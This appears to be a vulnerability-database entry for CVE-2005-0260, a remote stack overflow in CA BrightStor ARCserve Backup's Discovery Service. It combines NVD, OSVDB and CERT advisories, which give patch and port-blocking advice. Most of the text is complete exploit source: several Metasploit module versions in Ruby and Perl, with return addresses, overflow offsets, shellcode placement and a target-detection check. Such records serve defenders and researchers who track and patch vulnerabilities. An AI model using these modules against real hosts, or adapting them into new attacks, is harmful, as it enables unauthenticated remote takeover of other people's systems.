ID CVE-2005-0260
Type cve
Reporter NVD
Modified 2017-07-10T21:32:10
Description
Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote, unauthenticated attackers to execute arbitrary code via a long packet to UDP port 41524: the service reads up to 4 KB in a recvfrom() call but copies the data into a smaller (about 1 KB) stack buffer without checking the received length, so a single oversized datagram overwrites the saved return address. Public exploit modules (Metasploit, CANVAS) exist for this issue, so unpatched hosts exposing 41524/udp should be treated as trivially exploitable; apply the vendor patch or block the port at the perimeter and on the host until it is applied.
{"id": "CVE-2005-0260", "bulletinFamily": "NVD", "title": "CVE-2005-0260", "description": "Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.", "published": "2005-05-02T00:00:00", "modified": "2017-07-10T21:32:10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260", "reporter": "NVD", "references": ["http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1", "http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities", "http://securitytracker.com/id?1013138", "https://exchange.xforce.ibmcloud.com/vulnerabilities/19251"], "cvelist": ["CVE-2005-0260"], "type": "cve", "lastseen": "2017-07-11T11:14:46", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup:11.1"], "cvelist": ["CVE-2005-0260"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Stack-based buffer overflow in the Discovery Service for BrightStor ARCserve Backup 11.1 and earlier allows remote attackers to execute arbitrary code via a long packet to UDP port 41524, which is not properly handled in a recvfrom call.", "edition": 1, "enchantments": {}, "hash": "f55e90ecbe03d772ffd1ef1717098ba1457580a14c9b1fbbe8f7de504540d579", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a7c1fa94f4edbf2301b9bc8db07a9874", "key": "title"}, {"hash": "44f3f972f1219e5a5130d74f050ce136", "key": "published"}, {"hash": "235fd81ade99ad3d518b69e6f0eb898a", "key": "cpe"}, {"hash": "1ba25d5fd86624a97a3b2bf7198d508e", "key": "description"}, 
{"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "a8bdf6e67ebfac1b08e65c2af96d0301", "key": "modified"}, {"hash": "7e2613b49271c4d7be3d121b2cf2e99a", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3cb84a834510de183567ce26eba5e299", "key": "references"}, {"hash": "87e53a54faa92dae28db14d708aa83be", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260", "id": "CVE-2005-0260", "lastseen": "2016-09-03T05:05:27", "modified": "2008-09-05T16:45:47", "objectVersion": "1.2", "published": "2005-05-02T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/19251", "http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp#news1", "http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities", "http://securitytracker.com/id?1013138"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-0260", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T05:05:27"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "235fd81ade99ad3d518b69e6f0eb898a"}, {"key": "cvelist", "hash": "7e2613b49271c4d7be3d121b2cf2e99a"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "1ba25d5fd86624a97a3b2bf7198d508e"}, {"key": "href", "hash": "87e53a54faa92dae28db14d708aa83be"}, {"key": "modified", "hash": "7cca64543a2de89cb81b5ec8a12bb841"}, {"key": "published", "hash": "44f3f972f1219e5a5130d74f050ce136"}, {"key": "references", "hash": "d8d69c3a400ceb1f96a54a4093408ca3"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": 
"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "a7c1fa94f4edbf2301b9bc8db07a9874"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "97adbd3a0ba481cd98af1a30f95407f1258245052db77d73c2180382474d8f28", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-11T11:14:46"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:13613"]}, {"type": "exploitdb", "idList": ["EDB-ID:16406"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83122", "PACKETSTORM:36062"]}, {"type": "canvas", "idList": ["BRIGHTSTOR_DISCOVERY"]}, {"type": "cert", "idList": ["VU:864801"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/DISCOVERY_UDP"]}], "modified": "2017-07-11T11:14:46"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup:11.1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in BrightStor ARCserve Backup. The discovery service fails to properly check buffer boundaries, resulting in a stack overflow. With a specially crafted request, an unauthenticated attacker can cause arbitrary code execution, resulting in a complete loss of confidentiality, integrity and availability (CVSS 10.0).\n## Technical Description\nThe ARCserve Backup server uses a Discovery service to detect other backup servers on the local network. The Discovery service listens on UDP port 41524. While the Discovery service can accept packets up to 4k bytes (via the recvfrom() call), it copies this data to a smaller (1k byte) stack buffer without checking the received length, so a single oversized datagram overwrites the saved return address.\n## Solution Description\nCurrently, there is no known upgrade that corrects this issue; however, Computer Associates has released a patch to address this vulnerability. Until the patch is applied, block UDP port 41524 at the network perimeter and with host-based firewalls to limit exposure; note that perimeter filtering alone does not stop attackers already inside the network.\n## Short Description\nA remote overflow exists in BrightStor ARCserve Backup. The discovery service fails to properly check buffer boundaries, resulting in a stack overflow. 
With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.ca.com/\n[Vendor Specific Advisory URL](http://supportconnect.ca.com/sc/solcenter/sol_detail.jsp?aparno=QO62769&os=NT&returninput=0)\nSecurity Tracker: 1013138\n[Secunia Advisory ID:14183](https://secuniaresearch.flexerasoftware.com/advisories/14183/)\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities&flashstatus=true\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html\nKeyword: UDP Port 41524\n[CVE-2005-0260](https://vulners.com/cve/CVE-2005-0260)\n", "modified": "2004-12-20T09:11:53", "published": "2004-12-20T09:11:53", "href": "https://vulners.com/osvdb/OSVDB:13613", "id": "OSVDB:13613", "title": "CA BrightStor ARCserve Backup Discovery Service Buffer Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T23:47:53", "bulletinFamily": "exploit", "description": "CA BrightStor Discovery Service Stack Buffer Overflow. CVE-2005-0260. Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16406", "href": "https://www.exploit-db.com/exploits/16406/", "type": "exploitdb", "title": "CA BrightStor Discovery Service Stack Buffer Overflow", "sourceData": "##\r\n# $Id: discovery_udp.rb 9263 2010-05-09 17:52:51Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\r\n\t\t\t\tDiscovery Service. This vulnerability occurs when a large\r\n\t\t\t\trequest is sent to UDP port 41524, triggering a stack buffer\r\n\t\t\t\toverflow.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm', 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9263 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0260'],\r\n\t\t\t\t\t[ 'OSVDB', '13613'],\r\n\t\t\t\t\t[ 'BID', '12491'],\r\n\t\t\t\t\t[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'cheyprod.dll 12/12/2003',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x23808eb0, # call to edi reg\r\n\t\t\t\t\t\t\t'Offset' => 968,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'cheyprod.dll 07/21/2004',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x2380a908, # call edi\r\n\t\t\t\t\t\t\t'Offset' => 970,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 20 2004',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(41524)\r\n\t\t\t], 
self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\t# The first request should have no reply\r\n\t\tcsock = Rex::Socket::Tcp.create(\r\n\t\t\t'PeerHost' => datastore['RHOST'],\r\n\t\t\t'PeerPort' => 41523,\r\n\t\t\t'Context' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Msf' => framework,\r\n\t\t\t\t\t'MsfExploit' => self,\r\n\t\t\t\t})\r\n\r\n\t\tcsock.put('META')\r\n\t\tx = csock.get_once(-1, 3)\r\n\t\tcsock.close\r\n\r\n\t\t# The second request should be replied with the host name\r\n\t\tcsock = Rex::Socket::Tcp.create(\r\n\t\t\t'PeerHost' => datastore['RHOST'],\r\n\t\t\t'PeerPort' => 41523,\r\n\t\t\t'Context' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Msf' => framework,\r\n\t\t\t\t\t'MsfExploit' => self,\r\n\t\t\t\t})\r\n\r\n\t\tcsock.put('hMETA')\r\n\t\ty = csock.get_once(-1, 3)\r\n\t\tcsock.close\r\n\r\n\t\tif (y and not x)\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tbuf = rand_text_english(4096)\r\n\r\n\t\t# Target 0:\r\n\t\t#\r\n\t\t# esp @ 971\r\n\t\t# ret @ 968\r\n\t\t# edi @ 1046\r\n\t\t# end = 4092\r\n\r\n\t\tbuf[target['Offset'], 4] = [ target.ret ].pack('V')\r\n\t\tbuf[1046, payload.encoded.length] = payload.encoded\r\n\r\n\t\tudp_sock.put(buf)\r\n\t\tudp_sock.recvfrom(8192)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16406/"}], "cert": [{"lastseen": "2018-12-25T20:19:33", "bulletinFamily": "info", "description": "### Overview \n\nThe Computer Associates BrightStor ARCserve Backup Discovery Service contains a buffer overflow, which may allow a remote attacker to execute arbitrary code.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup is a cross-platform backup and recovery application. 
The ARCserve Backup Discovery Service fails to properly check incoming network traffic on 41524/udp, creating a buffer overflow vulnerability.\n\nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code on a system running the vulnerable software. \n \n--- \n \n### Solution \n\n**Upgrade or patch** \nUpgrade or install patches, as recommended by the [Computer Associates vulnerability 32056 description](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32056>). \n \n--- \n \n \n**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service (typically 41524/udp). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n864801\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### __ Computer Associates \n\nNotified: August 04, 2005 Updated: August 04, 2005 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [Computer Associates vulnerability 32056 description](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32056>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23864801 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32056>\n * <http://secunia.com/advisories/14183>\n * <http://xforce.iss.net/xforce/xfdb/19251>\n * <http://www.osvdb.org/displayvuln.php?osvdb_id=13613>\n\n### Credit\n\nThis vulnerability was reported by iDEFENSE, who in turn credits Patrik Karlsson and an anonymous source. \n\nThis document was written by Will Dormann. 
\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0260](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0260>) \n---|--- \n**Severity Metric:****** | 39.38 \n**Date Public:** | 2005-02-09 \n**Date First Published:** | 2005-08-04 \n**Date Last Updated: ** | 2005-08-11 19:07 UTC \n**Document Revision: ** | 7 \n", "modified": "2005-08-11T19:07:00", "published": "2005-08-04T00:00:00", "id": "VU:864801", "href": "https://www.kb.cert.org/vuls/id/864801", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup Discovery Service vulnerable to buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:31", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83122/CA-BrightStor-Discovery-Service-Overflow.html", "id": "PACKETSTORM:83122", "type": "packetstorm", "title": "CA BrightStor Discovery Service Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor Discovery Service Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the CA BrightStor \nDiscovery Service. This vulnerability occurs when a large \nrequest is sent to UDP port 41524, triggering a stack \noverflow. 
\n}, \n'Author' => [ 'hdm', 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0260'], \n[ 'OSVDB', '13613'], \n[ 'BID', '12491'], \n[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'], \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ \n'cheyprod.dll 12/12/2003', \n{ \n'Platform' => 'win', \n'Ret' => 0x23808eb0, # call to edi reg \n'Offset' => 968, \n}, \n], \n[ \n'cheyprod.dll 07/21/2004', \n{ \n'Platform' => 'win', \n'Ret' => 0x2380a908, # call edi \n'Offset' => 970, \n}, \n], \n], \n'DisclosureDate' => 'Dec 20 2004', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(41524) \n], self.class) \nend \n \ndef check \n \n# The first request should have no reply \ncsock = Rex::Socket::Tcp.create( \n'PeerHost' => datastore['RHOST'], \n'PeerPort' => 41523, \n'Context' => \n{ \n'Msf' => framework, \n'MsfExploit' => self, \n}) \n \ncsock.put('META') \nx = csock.get_once(-1, 3) \ncsock.close \n \n# The second request should be replied with the host name \ncsock = Rex::Socket::Tcp.create( \n'PeerHost' => datastore['RHOST'], \n'PeerPort' => 41523, \n'Context' => \n{ \n'Msf' => framework, \n'MsfExploit' => self, \n}) \n \ncsock.put('hMETA') \ny = csock.get_once(-1, 3) \ncsock.close \n \nif (y and not x) \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_udp \n \nprint_status(\"Trying target #{target.name}...\") \n \nbuf = rand_text_english(4096) \n \n# Target 0: \n# \n# esp @ 971 \n# ret @ 968 \n# edi @ 1046 \n# end = 4092 \n \nbuf[target['Offset'], 4] = [ target.ret ].pack('V') \nbuf[1046, payload.encoded.length] = payload.encoded \n \nudp_sock.put(buf) \nudp_sock.recvfrom(8192) \n \nhandler \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83122/discovery_udp.rb.txt"}, {"lastseen": "2016-12-05T22:17:43", "bulletinFamily": "exploit", "description": "", "modified": "2005-02-18T00:00:00", "published": "2005-02-18T00:00:00", "id": "PACKETSTORM:36062", "href": "https://packetstormsecurity.com/files/36062/cabrightstor_disco.pm.html", "type": "packetstorm", "title": "cabrightstor_disco.pm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be redistributed \n# according to the licenses defined in the Authors field below. In the \n# case of an unknown or missing license, this file defaults to the same \n# license as the core Framework (dual GPLv2 and Artistic). The latest \n# version of the Framework can always be obtained from metasploit.com. \n## \n \npackage Msf::Exploit::cabrightstor_disco; \nuse base \"Msf::Exploit\"; \nuse strict; \nuse Pex::Text; \n \nmy $advanced = { }; \n \nmy $info = \n{ \n'Name' => 'CA BrightStor Discovery Service Overflow', \n'Version' => '$Revision: 1.10 $', \n'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ], \n'Arch' => [ 'x86' ], \n'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ], \n'Priv' => 1, \n'AutoOpts' => { 'EXITFUNC' => 'process' }, \n \n'UserOpts' => \n{ \n'RHOST' => [1, 'ADDR', 'The target address'], \n'RPORT' => [1, 'PORT', 'The target port', 41524], \n}, \n \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500 \n'Keys' => ['+ws2ord'], \n}, \n \n'Description' => Pex::Text::Freeform(qq{ \nThis module exploits a vulnerability in the CA BrightStor \nDiscovery Service. This vulnerability occurs when a large \nrequest is sent to UDP port 41524, triggering a stack \noverflow. 
\n}), \n \n'Refs' => \n[ \n['BID', '12491'], \n['CVE', '2005-0260'], \n['URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'] \n], \n \n'Targets' => \n[ \n['cheyprod.dll 12/12/2003', 0x23808eb0], # call to edi reg \n], \n \n'Keys' => ['brightstor'], \n}; \n \nsub new { \nmy $class = shift; \nmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); \nreturn($self); \n} \n \nsub Check { \nmy $self = shift; \nmy $target_host = $self->GetVar('RHOST'); \nmy $target_port = 41523; \n \n# Connection #1 should not receive a response \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$s->Send(\"META\"); \nmy $res = $s->Recv(-1, 1); \n$s->Close; \n \nif ($res) { \n$self->PrintLine(\"[*] The discovery returned a strange response: $res\"); \n} \n \n# Connection #2 should receive the hostname of the target \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$s->Send(\"hMETA\"); \nmy $res = $s->Recv(-1, 1); \n$s->Close; \n \nif (! $res) { \n$self->PrintLine(\"[*] The discovery service did not respond to our query\"); \nreturn $self->CheckCode('Generic'); \n} \n \n$self->PrintLine(\"[*] Discovery service active on host: $res\"); \nreturn $self->CheckCode('Detected'); \n} \n \nsub Exploit { \nmy $self = shift; \nmy $target_host = $self->GetVar('RHOST'); \nmy $target_port = $self->GetVar('RPORT'); \nmy $target_idx = $self->GetVar('TARGET'); \nmy $shellcode = $self->GetVar('EncodedPayload')->Payload; \nmy $target = $self->Targets->[$target_idx]; \n \n$self->PrintLine(\"[*] Attempting to exploit target \" . 
$target->[0]); \n \nmy $s = Msf::Socket::Udp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn; \n} \n \nmy $bang = \"X\" x 4096; \n \n# esp @ 971 \n# ret @ 968 \n# edi @ 1046 \n# end = 4092 \n \nsubstr($bang, 968, 4, pack('V', $target->[1])); \nsubstr($bang, 1046, length($shellcode), $shellcode); \n \n$self->PrintLine(\"[*] Sending \" .length($bang) . \" bytes to remote host.\"); \n$s->Send($bang); \n$s->Recv(-1, 5); \n \nreturn; \n} \n \n1; \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/36062/cabrightstor_disco.pm"}], "canvas": [{"lastseen": "2016-09-25T14:12:54", "bulletinFamily": "exploit", "description": "**Name**| brightstor_discovery \n---|--- \n**CVE**| CVE-2005-0260 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CA BrightStor ARCserve Backup Discovery Service Overflow \n**Notes**| CVE Name: CVE-2005-0260 \nVENDOR: Computer Associates \nVersionsAffected: \nRepeatability: \nReferences: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=194 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260 \nDate public: 02/09/05 \nCVSS: 10.0 \n\n", "modified": "2005-05-02T00:00:00", "published": "2005-05-02T00:00:00", "id": "BRIGHTSTOR_DISCOVERY", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/brightstor_discovery", "type": "canvas", "title": "Immunity Canvas: BRIGHTSTOR_DISCOVERY", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-11T06:50:46", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the CA BrightStor Discovery Service. 
This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow.", "modified": "2017-11-08T16:00:24", "published": "2005-12-05T04:57:41", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/DISCOVERY_UDP", "href": "", "type": "metasploit", "title": "CA BrightStor Discovery Service Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the CA BrightStor\n Discovery Service. This vulnerability occurs when a large\n request is sent to UDP port 41524, triggering a stack buffer\n overflow.\n },\n 'Author' => [ 'hdm', 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0260'],\n [ 'OSVDB', '13613'],\n [ 'BID', '12491'],\n [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2048,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'cheyprod.dll 12/12/2003',\n {\n 'Platform' => 'win',\n 'Ret' => 0x23808eb0, # call to edi reg\n 'Offset' => 968,\n },\n ],\n [\n 'cheyprod.dll 07/21/2004',\n {\n 'Platform' => 'win',\n 'Ret' => 0x2380a908, # call edi\n 'Offset' => 970,\n },\n ],\n ],\n 'DisclosureDate' => 'Dec 20 2004',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(41524)\n ])\n end\n\n def check\n\n # The first request should have no reply\n csock = Rex::Socket::Tcp.create(\n 'PeerHost' => datastore['RHOST'],\n 'PeerPort' => 41523,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => 
self,\n })\n\n csock.put('META')\n x = csock.get_once(-1, 3)\n csock.close\n\n # The second request should be replied with the host name\n csock = Rex::Socket::Tcp.create(\n 'PeerHost' => datastore['RHOST'],\n 'PeerPort' => 41523,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n })\n\n csock.put('hMETA')\n y = csock.get_once(-1, 3)\n csock.close\n\n if (y and not x)\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect_udp\n\n print_status(\"Trying target #{target.name}...\")\n\n buf = rand_text_english(4096)\n\n # Target 0:\n #\n # esp @ 971\n # ret @ 968\n # edi @ 1046\n # end = 4092\n\n buf[target['Offset'], 4] = [ target.ret ].pack('V')\n buf[1046, payload.encoded.length] = payload.encoded\n\n udp_sock.put(buf)\n udp_sock.recvfrom(8192)\n\n handler\n disconnect_udp\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/brightstor/discovery_udp.rb"}]}